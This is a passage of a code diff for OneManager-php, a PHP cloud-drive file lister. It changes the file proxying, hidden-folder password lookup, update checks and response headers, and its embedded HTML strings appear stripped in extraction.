$fileConduitCacheTime = getConfig('fileConduitCacheTime', $_SERVER['disktag']); + if (!!$fileConduitSize || !!$fileConduitCacheTime) { + if ($fileConduitSize>0) $fileConduitSize *= 1024*1024; + else $fileConduitSize = 1024*1024; + if ($fileConduitCacheTime>0) $fileConduitCacheTime *= 3600; + else $fileConduitCacheTime = 3600; + /*if ($_SERVER['HTTP_RANGE']!='') { + $header['Range'] = $_SERVER['HTTP_RANGE']; + + $response = curl('GET', $files['url'], '', $header, 1); + //return output($header['Range'] . json_encode($response['returnhead'])); + return output( + $response['body'], + $response['stat'], + $response['returnhead'], + //['Accept-Ranges' => 'bytes', 'Range' => $response['returnhead']['Range'], 'Content-Type' => $files['mime'], 'Cache-Control' => 'max-age=' . $fileConduitCacheTime], + false + ); + } else { + return output('', 206, + ['Accept-Ranges' => 'bytes', 'Content-Range' => 'bytes 0-0/' . $files['size'], 'Content-Type' => $files['mime'] ] + ); + }*/ + if ($files['size']<$fileConduitSize) return output( + base64_encode(file_get_contents($files['url'])), + 200, + [ + 'Accept-Ranges' => 'bytes', + //'access-control-allow-origin' => '*', + //'access-control-expose-headers' => 'Content-Length, WWW-Authenticate, Location, Accept-Ranges', + 'Content-Type' => $files['mime'], + 'Cache-Control' => 'max-age=' . $fileConduitCacheTime, + //'Cache-Control' => 'max-age=0', + 'Last-Modified' => gmdate('D, d M Y H:i:s T', strtotime($files['time'])) + ], + true + ); + } + if ($_SERVER['HTTP_RANGE']!='') $header['Range'] = $_SERVER['HTTP_RANGE']; + $header['Location'] = $url; + $domainforproxy = ''; + $domainforproxy = getConfig('domainforproxy', $_SERVER['disktag']); + if ($domainforproxy!='') { + $url = proxy_replace_domain($url, $domainforproxy, $header); + } + return output('', 302, $header); } - return message(''.getconstStr('Back').getconstStr('Home').'' . $files['error']['message'] . '
' . $files['error']['message'] . '
' . json_encode($ispassfile, JSON_PRETTY_PRINT) . ''; - if (isset($ispassfile['file'])) { - $arr = curl_request($ispassfile[$_SERVER['DownurlStrName']]); + if ($ispassfile['type']=='file') { + $arr = curl('GET', $ispassfile['url']); if ($arr['stat']==200) { $passwordf=explode("\n",$arr['body']); $password=$passwordf[0]; - if ($password!='') $password=md5($password); - savecache('path_' . $path1 . '/?password', $password); - return $password; + if ($password==='') { + return ''; + } else { + $password=md5($password); + savecache('path_' . $path1 . '/?password', $password, $_SERVER['disktag']); + return $password; + } } else { //return md5('DefaultP@sswordWhenNetworkError'); return md5( md5(time()).rand(1000,9999) ); } } else { - savecache('path_' . $path1 . '/?password', 'null'); + savecache('path_' . $path1 . '/?password', 'null', $_SERVER['disktag']); if ($path !== '' ) { $path = substr($path,0,strrpos($path,'/')); return gethiddenpass($path,$passfile); @@ -657,37 +1000,94 @@ function get_timezone($timezone = '8') return $timezones[$timezone]; } -function message($message, $title = 'Message', $statusCode = 200) +function message($message, $title = 'Message', $statusCode = 200, $wainstat = 0) { - return output(' + $html = ' + ' . getconstStr('Back') . getconstStr('Home') . '
+
'; + if ($wainstat) { + $html .= ' + + '; + } else { + $html .= ' + '; + } + $html .= ' -', $statusCode); +'; + return output($html, $statusCode); } function needUpdate() { - $current_ver = file_get_contents(__DIR__ . '/version'); - $current_ver = substr($current_ver, strpos($current_ver, '.')+1); + global $slash; + $current_version = file_get_contents(__DIR__ . $slash . 'version'); + $current_ver = substr($current_version, strpos($current_version, '.')+1); $current_ver = explode(urldecode('%0A'),$current_ver)[0]; $current_ver = explode(urldecode('%0D'),$current_ver)[0]; - $github_version = file_get_contents('https://raw.githubusercontent.com/qkqpttgf/OneManager-php/master/version'); + $split = splitfirst($current_version, '.' . $current_ver)[0] . '.' . $current_ver; + if (!($github_version = getcache('github_version'))) { + //$tmp = curl('GET', 'https://raw.githubusercontent.com/qkqpttgf/OneManager-php/master/version'); + $tmp = curl('GET', 'https://git.hit.edu.cn/ysun/OneManager-php/-/raw/master/version'); + if ($tmp['stat']==0) return 0; + $github_version = $tmp['body']; + savecache('github_version', $github_version); + } $github_ver = substr($github_version, strpos($github_version, '.')+1); $github_ver = explode(urldecode('%0A'),$github_ver)[0]; $github_ver = explode(urldecode('%0D'),$github_ver)[0]; if ($current_ver != $github_ver) { - $_SERVER['github_version'] = $github_version; + //$_SERVER['github_version'] = $github_version; + $_SERVER['github_ver_new'] = splitfirst($github_version, $split)[0]; + $_SERVER['github_ver_old'] = splitfirst($github_version, $_SERVER['github_ver_new'])[1]; return 1; } return 0; @@ -695,6 +1095,10 @@ function needUpdate() function output($body, $statusCode = 200, $headers = ['Content-Type' => 'text/html'], $isBase64Encoded = false) { + if (isset($_SERVER['Set-Cookie'])) $headers['Set-Cookie'] = $_SERVER['Set-Cookie']; + if (baseclassofdrive()=='Aliyundrive') $headers['Referrer-Policy'] = 'no-referrer'; + //$headers['Referrer-Policy'] = 'same-origin'; + //$headers['X-Frame-Options'] = 'sameorigin'; return [ 'isBase64Encoded' => $isBase64Encoded, 'statusCode' => $statusCode, @@ -705,12 +1109,13 @@ function output($body, $statusCode = 200, $headers = ['Content-Type' => 'text/ht function passhidden($path) { - $path = str_replace('+','%2B',$path); - $path = str_replace('&','&', path_format(urldecode($path))); + if ($_SERVER['admin']) return 0; + //$path = str_replace('+','%2B',$path); + //$path = str_replace('&','&', path_format(urldecode($path))); if (getConfig('passfile') != '') { - $path = spurlencode($path,'/'); - if (substr($path,-1)=='/') $path=substr($path,0,-1); - $hiddenpass=gethiddenpass($path,getConfig('passfile')); + //$path = spurlencode($path,'/'); + //if (substr($path,-1)=='/') $path=substr($path,0,-1); + $hiddenpass=gethiddenpass($path, getConfig('passfile')); if ($hiddenpass != '') { return comppass($hiddenpass); } else { @@ -728,7 +1133,7 @@ function size_format($byte) while (abs($byte) >= 1024) { $byte = $byte / 1024; $i++; - if ($i == 3) break; + if ($i == 4) break; } $units = array('B', 'KB', 'MB', 'GB', 'TB'); $ret = round($byte, 2); @@ -737,219 +1142,197 @@ function size_format($byte) function time_format($ISO) { + if ($ISO=='') return date('Y-m-d H:i:s'); $ISO = str_replace('T', ' ', $ISO); $ISO = str_replace('Z', ' ', $ISO); - //return $ISO; return date('Y-m-d H:i:s',strtotime($ISO . " UTC")); } -function get_thumbnails_url($path = '/') +function adminform($name = '', $pass = '', $storage = '', $path = '') { - $path1 = path_format($path); - $path = path_format($_SERVER['list_path'] . path_format($path)); - if ($path!='/'&&substr($path,-1)=='/') $path=substr($path,0,-1); - $thumb_url = getcache('thumb_'.$path); - if ($thumb_url!='') return output($thumb_url); - $url = $_SERVER['api_url']; - if ($path !== '/') { - $url .= ':' . $path; - if (substr($url,-1)=='/') $url=substr($url,0,-1); - } - $url .= ':/thumbnails/0/medium'; - $files = json_decode(curl_request($url, false, ['Authorization' => 'Bearer ' . $_SERVER['access_token']])['body'], true); - if (isset($files['url'])) { - savecache('thumb_'.$path, $files['url']); - return output($files['url']); - } - return output('', 404); -} - -function bigfileupload($path) -{ - $path1 = path_format($_SERVER['list_path'] . path_format($path)); - if (substr($path1,-1)=='/') $path1=substr($path1,0,-1); - if ($_GET['upbigfilename']!=''&&$_GET['filesize']>0) { - $fileinfo['name'] = $_GET['upbigfilename']; - $fileinfo['size'] = $_GET['filesize']; - $fileinfo['lastModified'] = $_GET['lastModified']; - $filename = spurlencode( $fileinfo['name'] ); - $cachefilename = '.' . $fileinfo['lastModified'] . '_' . $fileinfo['size'] . '_' . $filename . '.tmp'; - $getoldupinfo=fetch_files(path_format($path . '/' . $cachefilename)); - //echo json_encode($getoldupinfo, JSON_PRETTY_PRINT); - if (isset($getoldupinfo['file'])&&$getoldupinfo['size']<5120) { - $getoldupinfo_j = curl_request($getoldupinfo[$_SERVER['DownurlStrName']]); - $getoldupinfo = json_decode($getoldupinfo_j['body'], true); - if ( json_decode( curl_request($getoldupinfo['uploadUrl'])['body'], true)['@odata.context']!='' ) return output($getoldupinfo_j['body'], $getoldupinfo_j['stat']); - } - if (!$_SERVER['admin']) $filename = spurlencode( $fileinfo['name'] ) . '.scfupload'; - $response=MSAPI('createUploadSession',path_format($path1 . '/' . $filename),'{"item": { "@microsoft.graph.conflictBehavior": "fail" }}',$_SERVER['access_token']); - $responsearry = json_decode($response['body'],true); - if (isset($responsearry['error'])) return output($response['body'], $response['stat']); - $fileinfo['uploadUrl'] = $responsearry['uploadUrl']; - MSAPI('PUT', path_format($path1 . '/' . $cachefilename), json_encode($fileinfo, JSON_PRETTY_PRINT), $_SERVER['access_token'])['body']; - return output($response['body'], $response['stat']); - } - return output('error', 400); -} - -function adminform($name = '', $pass = '', $path = '') -{ - $statusCode = 401; - $html = '